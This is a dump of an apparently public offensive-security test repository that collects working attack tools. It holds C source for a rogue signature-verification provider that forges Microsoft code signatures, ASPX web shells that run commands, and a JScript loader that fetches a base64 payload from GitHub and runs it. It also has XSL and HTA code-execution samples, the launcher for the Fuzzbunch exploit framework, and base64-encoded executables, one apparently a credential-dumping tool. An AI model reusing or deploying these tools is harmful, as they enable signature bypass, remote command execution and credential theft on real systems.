= L"foo"; 101 | SupportedExtensions[1] = L"bar"; 102 | SupportedExtensions[2] = L"baz"; 103 | 104 | bResult = FALSE; 105 | 106 | if (pwszFileName && pgSubject) { 107 | Extension = wcsrchr(pwszFileName, '.'); 108 | 109 | if (Extension) { 110 | Extension++; 111 | 112 | for (i = 0; i < SUPPORTED_EXTENSION_COUNT; i++) { 113 | if (!_wcsicmp(Extension, SupportedExtensions[i])) { 114 | bResult = TRUE; 115 | memcpy(pgSubject, &MySIPGUID, sizeof(GUID)); 116 | break; 117 | } 118 | } 119 | } 120 | } else { 121 | SetLastError(ERROR_INVALID_PARAMETER); 122 | } 123 | 124 | return bResult; 125 | } 126 | 127 | // Such a beautiful unimplemented function, IMO. This is the jedi mindtrick of hash validation. ;) 128 | // This simply states, "I don't care what the hash of the file is. I say it matches the signature in the certificate." 129 | BOOL WINAPI AutoApproveHash(SIP_SUBJECTINFO *pSubjectInfo, SIP_INDIRECT_DATA *pIndirectData) { 130 | UNREFERENCED_PARAMETER(pSubjectInfo); 131 | UNREFERENCED_PARAMETER(pIndirectData); 132 | 133 | return TRUE; 134 | } 135 | 136 | // Supplies the embedded certificate to WinVerifyTrust. 137 | // Note: An IOC can be easily made from the "LEGITCERT" embedded resource name. 138 | BOOL WINAPI GetLegitMSSignature(SIP_SUBJECTINFO *pSubjectInfo, DWORD *pdwEncodingType, DWORD dwIndex, DWORD *pcbSignedDataMsg, BYTE *pbSignedDataMsg) { 139 | HRSRC hCertResource; 140 | HGLOBAL hResLoaded; 141 | LPVOID lpResAddress; 142 | DWORD dwResourceSize; 143 | DWORD dwErrorCode; 144 | 145 | dwErrorCode = ERROR_SUCCESS; 146 | 147 | 148 | 149 | if(lstrcmpi((LPCTSTR)pSubjectInfo->pwsFileName,L"C:\\test\\cer\\1.ps1")==0) 150 | { 151 | // MessageBox (NULL,L"Get selected file", (LPCTSTR)pSubjectInfo->pwsFileName,0) ; 152 | 153 | // pSubjectInfo is a required argument. I don't actually use pSubjectInfo 154 | // though since all this PoC does is return the same legit, MS cert. 155 | // pdwEncodingType is a required argument 156 | // dwIndex must be 0 157 | // pcbSignedDataMsg is a required argument 158 | // pbSignedDataMsg can be null 159 | if ((pSubjectInfo == NULL) || (pdwEncodingType == NULL) || (pcbSignedDataMsg == NULL) || (dwIndex != 0)) { 160 | dwErrorCode = ERROR_INVALID_PARAMETER; 161 | goto erroroccurred; 162 | } 163 | 164 | // Get a handle to the legitimate Microsoft certificate embedded in this DLL. 165 | // The certificate was embedded as a resource to facilitate a user swapping it out with another one using a resource editor util. 166 | hCertResource = FindResource(DllModuleAddress, MAKEINTRESOURCE(IDR_BINARY1), L"LEGITCERT"); 167 | 168 | if (hCertResource == NULL) { 169 | dwErrorCode = GetLastError(); 170 | goto erroroccurred; 171 | } 172 | 173 | hResLoaded = LoadResource(DllModuleAddress, hCertResource); 174 | 175 | if (hResLoaded == NULL) { 176 | dwErrorCode = GetLastError(); 177 | goto erroroccurred; 178 | } 179 | 180 | // Get the address of the resource in memory. 181 | lpResAddress = LockResource(hResLoaded); 182 | 183 | if (lpResAddress == NULL) { 184 | dwErrorCode = ERROR_NOT_ENOUGH_MEMORY; 185 | goto erroroccurred; 186 | } 187 | 188 | dwResourceSize = SizeofResource(DllModuleAddress, hCertResource); 189 | 190 | // Return the size of the resource even if it's zero. The caller should know regardless. 191 | *pcbSignedDataMsg = dwResourceSize; 192 | 193 | // There should always be a resource present of a non-zero size. 194 | if (dwResourceSize == 0) { 195 | dwErrorCode = GetLastError(); 196 | goto erroroccurred; 197 | } 198 | 199 | // The first time this func is called, pbSignedDataMsg is expected to be 200 | // null in order to determine the proper buffer size that the caller needs to allocate. 201 | if ((pbSignedDataMsg == NULL) || (dwResourceSize > *pcbSignedDataMsg)) { 202 | dwErrorCode = ERROR_INSUFFICIENT_BUFFER; 203 | goto erroroccurred; 204 | } else { 205 | // Copy the resource to the signed data msg buffer. 206 | memcpy(pbSignedDataMsg, lpResAddress, dwResourceSize); 207 | } 208 | 209 | erroroccurred: 210 | SetLastError(dwErrorCode); 211 | 212 | // Setting this is necessary in order for AutoApproveHash to ultimately be called. 213 | // Without this set, the returned signature will fail to decode. 214 | *pdwEncodingType = PKCS_7_ASN_ENCODING | X509_ASN_ENCODING; 215 | 216 | return dwErrorCode == ERROR_SUCCESS; 217 | } 218 | return dwErrorCode; 219 | } 220 | -------------------------------------------------------------------------------- /NodeJS-Downloader.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/NodeJS-Downloader.zip -------------------------------------------------------------------------------- /PageLoad_ghostfile.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" AutoEventWireup="true" validateRequest="false" EnableViewStateMac="false" %> 2 | <%@ Import Namespace="System.Web.Hosting" %> 3 | <%@ Import Namespace="System.Web.Compilation" %> 4 | <%@ Import Namespace="System.IO" %> 5 | <%@ Import Namespace="System.Reflection" %> 6 | <%@ Import Namespace="System.Security.Cryptography" %> 7 | -------------------------------------------------------------------------------- /RunProcessHacker.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/RunProcessHacker.msi -------------------------------------------------------------------------------- /UserAdd.msi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/UserAdd.msi -------------------------------------------------------------------------------- /XamlToViewState.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/XamlToViewState.zip -------------------------------------------------------------------------------- /a.exe: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | demo 13 | 14 | 15 | -------------------------------------------------------------------------------- /addon.node: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/addon.node -------------------------------------------------------------------------------- /calc.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc.dll -------------------------------------------------------------------------------- /calc.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | demo 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /calc.ppa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc.ppa -------------------------------------------------------------------------------- /calc.ps1: -------------------------------------------------------------------------------- 1 | start-process calc.exe 2 | -------------------------------------------------------------------------------- /calc.xlam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc.xlam -------------------------------------------------------------------------------- /calc2.ps1: -------------------------------------------------------------------------------- 1 | Start-Sleep -Seconds 10 2 | start-process calc.exe 3 | -------------------------------------------------------------------------------- /calc_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calc_x64.dll -------------------------------------------------------------------------------- /calcbase64.txt: -------------------------------------------------------------------------------- 1 | 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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY2FsYy5leGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA0AAAACjAQMCowMjA4MEMwUDBYMGYwazBwMHUwgDCNMJcwrDC4ML4w4DDyME4xajEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 | -------------------------------------------------------------------------------- /calcexit.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calcexit.dll -------------------------------------------------------------------------------- /calcmutex.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calcmutex.dll -------------------------------------------------------------------------------- /calcmutex_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/calcmutex_x64.dll -------------------------------------------------------------------------------- /cliramdisk&imdisk.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/cliramdisk&imdisk.rar -------------------------------------------------------------------------------- /com_zimbra_example_simplejspaction.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/com_zimbra_example_simplejspaction.zip -------------------------------------------------------------------------------- /com_zimbra_test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/com_zimbra_test.zip -------------------------------------------------------------------------------- /csv.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 | 9 | 10 | 11 | function myFunction() { 12 | var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 13 | return ""; 14 | } 15 | 16 | 17 | 18 | 19 | 20 | 21 | Node,, 22 | 23 | 24 | 25 | {;} 26 | 27 | 28 | ,, 29 | 30 | 31 | 32 | 33 | 34 | 35 | "" 36 | 37 | \\\: 38 | 39 | .="", 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /csvde.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/csvde.zip -------------------------------------------------------------------------------- /dnscmd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/dnscmd.exe -------------------------------------------------------------------------------- /dnscmd.exe.mui: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/dnscmd.exe.mui -------------------------------------------------------------------------------- /download.js: -------------------------------------------------------------------------------- 1 | function base64ToStream(b) { 2 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 3 | var length = enc.GetByteCount_2(b); 4 | var ba = enc.GetBytes_4(b); 5 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 6 | ba = transform.TransformFinalBlock(ba, 0, length); 7 | var ms = new ActiveXObject("System.IO.MemoryStream"); 8 | ms.Write(ba, 0, (length / 4) * 3); 9 | ms.Position = 0; 10 | return ms; 11 | } 12 | 13 | h=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); 14 | h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt",false); 15 | h.Send(); 16 | 17 | var stm = base64ToStream(h.ResponseText); 18 | -------------------------------------------------------------------------------- /downloadexec.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 18 | 19 | 20 | 21 | 22 | 23 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /downloadexec2.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 31 | 32 | 33 | 34 | 35 | 36 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /downloadexec3.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | 13 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /dumpert.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/dumpert.dll -------------------------------------------------------------------------------- /execCmd.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#"%> 2 | <%@ Import namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO"%> 4 | 5 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /execUI.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO" %> 4 | 5 | 6 | 7 | 64 | 65 | 66 | 67 | Command 68 | 69 | 70 |
71 |
72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 |
Auth Key:
Command:
 
85 |
86 |
87 | 88 | 89 | 90 | -------------------------------------------------------------------------------- /fb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.6 2 | import code 3 | import os 4 | import sys 5 | 6 | from fuzzbunch import env 7 | 8 | """ 9 | Set up core paths 10 | 11 | """ 12 | (FB_FILE, FB_DIR, EDFLIB_DIR) = env.setup_core_paths( os.path.realpath(__file__)) 13 | 14 | """ 15 | Make sure our libraries are setup properly 16 | """ 17 | #env.setup_lib_paths(os.path.abspath(__file__), EDFLIB_DIR) 18 | 19 | """ 20 | Plugin directories 21 | """ 22 | PAYLOAD_DIR = os.path.join(FB_DIR, "payloads") 23 | EXPLOIT_DIR = os.path.join(FB_DIR, "exploits") 24 | TOUCH_DIR = os.path.join(FB_DIR, "touches") 25 | IMPLANT_DIR = os.path.join(FB_DIR, "implants") 26 | #LP_DIR = os.path.join(FB_DIR, "listeningposts") 27 | #EDE_DIR = os.path.join(FB_DIR, "ede-exploits") 28 | #TRIGGER_DIR = os.path.join(FB_DIR, "triggers") 29 | SPECIAL_DIR = os.path.join(FB_DIR, "specials") 30 | 31 | """ 32 | Fuzzbunch directories 33 | """ 34 | LOG_DIR = os.path.join(FB_DIR, "logs") 35 | FB_CONFIG = os.path.join(FB_DIR, "Fuzzbunch.xml") 36 | 37 | from fuzzbunch.edfplugin import EDFPlugin 38 | #from fuzzbunch.edeplugin import EDEPlugin 39 | from fuzzbunch.fuzzbunch import Fuzzbunch 40 | from fuzzbunch.pluginfinder import addplugins, PluginfinderError 41 | from fuzzbunch import exception 42 | from fuzzbunch.daveplugin import DAVEPlugin 43 | from fuzzbunch.deployablemanager import DeployableManager 44 | 45 | def do_interactive(fb): 46 | gvars = globals() 47 | gvars['quit'] = (lambda *x: fb.io.print_error("Press Ctrl-D to quit")) 48 | gvars['exit'] = gvars['quit'] 49 | fb.io.print_warning("Dropping to Interactive Python Interpreter") 50 | fb.io.print_warning("Press Ctrl-D to exit") 51 | code.interact(local=gvars, banner="") 52 | 53 | def main(fb): 54 | #fb.printbanner() 55 | fb.cmdqueue.append("retarget") 56 | while 1: 57 | try: 58 | fb.cmdloop() 59 | except exception.Interpreter: 60 | do_interactive(fb) 61 | else: 62 | break 63 | 64 | def load_plugins(fb): 65 | fb.io.pre_input(None) 66 | fb.io.print_msg("Loading Plugins") 67 | fb.io.post_input() 68 | addplugins(fb, "Exploit", EXPLOIT_DIR, EDFPlugin) 69 | addplugins(fb, "Payload", PAYLOAD_DIR, EDFPlugin) 70 | addplugins(fb, "Touch", TOUCH_DIR, EDFPlugin) 71 | addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin) 72 | #addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin) 73 | addplugins(fb, "Special", SPECIAL_DIR, DAVEPlugin, DeployableManager) 74 | # addplugins(fb, "EDE-Exploit", EDE_DIR, EDEPlugin) 75 | # addplugins(fb, "Trigger", TRIGGER_DIR, EDFPlugin) 76 | 77 | @exception.exceptionwrapped 78 | def setup_and_run(config, fbdir, logdir): 79 | # Setup fb globally so that we can debug interactively if we want 80 | global fb 81 | fb = Fuzzbunch(config, fbdir, logdir) 82 | fb.printbanner() 83 | load_plugins(fb) 84 | main(fb) 85 | 86 | if __name__ == "__main__": 87 | setup_and_run(FB_CONFIG, FB_DIR, LOG_DIR) 88 | -------------------------------------------------------------------------------- /helloworld.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | helloworld 5 | 6 | 7 | -------------------------------------------------------------------------------- /katz.txt: -------------------------------------------------------------------------------- 1 | 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